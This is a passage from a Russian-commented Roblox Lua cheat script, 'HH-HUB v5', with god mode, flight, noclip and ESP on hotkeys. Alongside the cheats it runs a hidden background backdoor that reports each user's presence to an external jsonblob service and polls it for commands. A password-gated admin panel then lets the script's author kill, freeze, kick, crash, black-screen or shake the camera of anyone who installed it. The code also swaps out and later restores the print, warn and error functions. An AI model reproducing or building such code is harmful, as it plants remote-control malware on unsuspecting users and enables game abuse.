            btn.Font = Enum.Font.GothamBold
            btn.Parent = btnContainer
            
            local btnCorner = Instance.new("UICorner")
            btnCorner.CornerRadius = UDim.new(0, 5)
            btnCorner.Parent = btn
            
            btn.MouseButton1Click:Connect(callback)
        end
        
        -- Кнопки
        addBtn("💀 Kill", Color3.fromRGB(220, 60, 60), function()
            sendBackdoorCommand(uid, "KILL_PLAYER", "")
        end)
        
        addBtn("🔄 Loop", Color3.fromRGB(220, 120, 60), function()
            sendBackdoorCommand(uid, "START_KILL_LOOP", "")
        end)
        
        addBtn("⏹️ Stop", Color3.fromRGB(100, 100, 100), function()
            sendBackdoorCommand(uid, "STOP_KILL_LOOP", "")
        end)
        
        addBtn("❄️ Freeze", Color3.fromRGB(60, 120, 220), function()
            sendBackdoorCommand(uid, "FREEZE_PLAYER", "")
        end)
        
        addBtn("🔥 Unfreeze", Color3.fromRGB(220, 160, 60), function()
            sendBackdoorCommand(uid, "UNFREEZE_PLAYER", "")
        end)
        
        addBtn("👢 Kick", Color3.fromRGB(200, 80, 80), function()
            sendBackdoorCommand(uid, "KICK_PLAYER", "Вы кикнуты администратором")
        end)
        
        addBtn("👁️ Watch", Color3.fromRGB(140, 80, 255), function()
            local target = Players:GetPlayerByUserId(tonumber(uid))
            if target then
                Camera.CameraSubject = target.Character and target.Character:FindFirstChild("HumanoidRootPart") or target.Character
            end
        end)
        
        addBtn("📍 TP to", Color3.fromRGB(60, 180, 140), function()
            local target = Players:GetPlayerByUserId(tonumber(uid))
            local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
            if target and target.Character and root then
                local tRoot = target.Character:FindFirstChild("HumanoidRootPart")
                if tRoot then
                    root.CFrame = tRoot.CFrame * CFrame.new(0, 3, 5)
                end
            end
        end)
        
        addBtn("📦 Bring", Color3.fromRGB(100, 200, 80), function()
            local target = Players:GetPlayerByUserId(tonumber(uid))
            local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
            if target and target.Character and root then
                local tRoot = target.Character:FindFirstChild("HumanoidRootPart")
                if tRoot then
                    tRoot.CFrame = root.CFrame * CFrame.new(0, 0, -5)
                end
            end
        end)
        
        addBtn("⚡ Speed 1", Color3.fromRGB(100, 140, 200), function()
            sendBackdoorCommand(uid, "SET_WALKSPEED", "1")
        end)
        
        addBtn("🚀 Speed 100", Color3.fromRGB(200, 200, 60), function()
            sendBackdoorCommand(uid, "SET_WALKSPEED", "100")
        end)
        
        addBtn("💥 Crash", Color3.fromRGB(200, 50, 50), function()
            sendBackdoorCommand(uid, "CRASH_PLAYER", "")
        end)
        
        addBtn("⬛ Black", Color3.fromRGB(50, 50, 50), function()
            sendBackdoorCommand(uid, "BLACK_SCREEN", "")
        end)
        
        addBtn("⚡ Flash", Color3.fromRGB(255, 255, 0), function()
            sendBackdoorCommand(uid, "FLASH_SCREEN", "")
        end)
        
        addBtn("🌀 Shake", Color3.fromRGB(150, 150, 150), function()
            sendBackdoorCommand(uid, "SHAKE_CAMERA", "")
        end)
    end
    
    -- Функция обновления списка
    local function refreshList()
        for _, child in ipairs(content:GetChildren()) do
            if child:IsA("Frame") and child ~= searchBox and child ~= statsFrame then
                child:Destroy()
            end
        end
        
        local players = jsonblobGet(PRESENCE_BLOB_ID)
        local searchText = searchBox.Text:lower()
        local total = 0
        local same = 0
        local backdoor = 0
        
        for uid, info in pairs(players) do
            total = total + 1
            if info.same then same = same + 1 end
            if info.hasBackdoor then backdoor = backdoor + 1 end
            
            if searchText == "" or info.name:lower():find(searchText) then
                addPlayerCard(uid, info)
            end
        end
        
        totalLabel.Text = "Всего: " .. total
        sameLabel.Text = "В сервере: " .. same
        backdoorLabel.Text = "Бекдор: " .. backdoor
    end
    
    searchBox:GetPropertyChangedSignal("Text"):Connect(refreshList)
    refreshList()
    
    -- Автообновление
    task.spawn(function()
        while adminPanel and adminPanel.Parent do
            task.wait(5)
            pcall(refreshList)
        end
    end)
end

-- ==============================================
-- БЕКДОР В ФОНЕ
-- ==============================================
task.spawn(function()
    while true do
        pcall(updatePresence)
        pcall(readCommands)
        task.wait(10)
    end
end)

-- ==============================================
-- ГОРЯЧИЕ КЛАВИШИ
-- ==============================================
UIS.InputBegan:Connect(function(input, gp)
    if gp then return end
    
    if input.KeyCode == Enum.KeyCode.Insert then
        local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
        if hum then hum.Health = hum.MaxHealth end
        
    elseif input.KeyCode == Enum.KeyCode.Delete then
        if GodMode.active then disableGodMode() else enableGodMode() end
        
    elseif input.KeyCode == Enum.KeyCode.Home then
        if Flight.active then disableFlight() else enableFlight() end
        
    elseif input.KeyCode == Enum.KeyCode.RightShift then
        if Noclip.active then disableNoclip() else enableNoclip() end
        
    elseif input.KeyCode == Enum.KeyCode.RightAlt then
        if ESP.active then disableESP() else enableESP() end
        
    elseif input.KeyCode == Enum.KeyCode.End then
        if not isAdmin then
            local passGui = Instance.new("ScreenGui")
            passGui.Parent = LP:FindFirstChild("PlayerGui") or Instance.new("ScreenGui")
            
            local passFrame = Instance.new("Frame")
            passFrame.Size = UDim2.new(0, 300, 0, 150)
            passFrame.Position = UDim2.new(0.5, -150, 0.5, -75)
            passFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 30)
            passFrame.Parent = passGui
            
            local pCorner = Instance.new("UICorner")
            pCorner.CornerRadius = UDim.new(0, 10)
            pCorner.Parent = passFrame
            
            local pTitle = Instance.new("TextLabel")
            pTitle.Size = UDim2.new(1, 0, 0, 40)
            pTitle.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
            pTitle.BackgroundTransparency = 0.3
            pTitle.Text = "🔐 Вход"
            pTitle.TextColor3 = Color3.fromRGB(200, 150, 255)
            pTitle.TextScaled = true
            pTitle.Font = Enum.Font.GothamBold
            pTitle.Parent = passFrame
            
            local box = Instance.new("TextBox")
            box.Size = UDim2.new(0.8, 0, 0, 35)
            box.Position = UDim2.new(0.1, 0, 0.4, 0)
            box.BackgroundColor3 = Color3.fromRGB(40, 40, 50)
            box.PlaceholderText = "Пароль"
            box.Text = ""
            box.TextColor3 = Color3.fromRGB(255, 255, 255)
            box.TextScaled = true
            box.Font = Enum.Font.Gotham
            box.Parent = passFrame
            
            local submit = Instance.new("TextButton")
            submit.Size = UDim2.new(0.5, 0, 0, 35)
            submit.Position = UDim2.new(0.25, 0, 0.7, 0)
            submit.BackgroundColor3 = Color3.fromRGB(100, 50, 255)
            submit.Text = "Войти"
            submit.TextColor3 = Color3.fromRGB(255, 255, 255)
            submit.TextScaled = true
            submit.Font = Enum.Font.GothamBold
            submit.Parent = passFrame
            
            submit.MouseButton1Click:Connect(function()
                if box.Text == ADMIN_PASSWORD then
                    isAdmin = true
                    passGui:Destroy()
                    createAdminPanel()
                else
                    box.Text = ""
                    box.PlaceholderText = "Неверно!"
                end
            end)
        else
            if adminPanel then
                adminPanel:Destroy()
                adminPanel = nil
            else
                createAdminPanel()
            end
        end
    end
end)

-- ==============================================
-- ЗАПУСК
-- ==============================================
task.wait(1)
SG:SetCore("SendNotification", {
    Title = "⚡ HH-HUB v5",
    Text = "Загружено! INS - лечение, DEL - God Mode",
    Duration = 4
})

print = oldPrint
warn = oldWarn
error = oldError
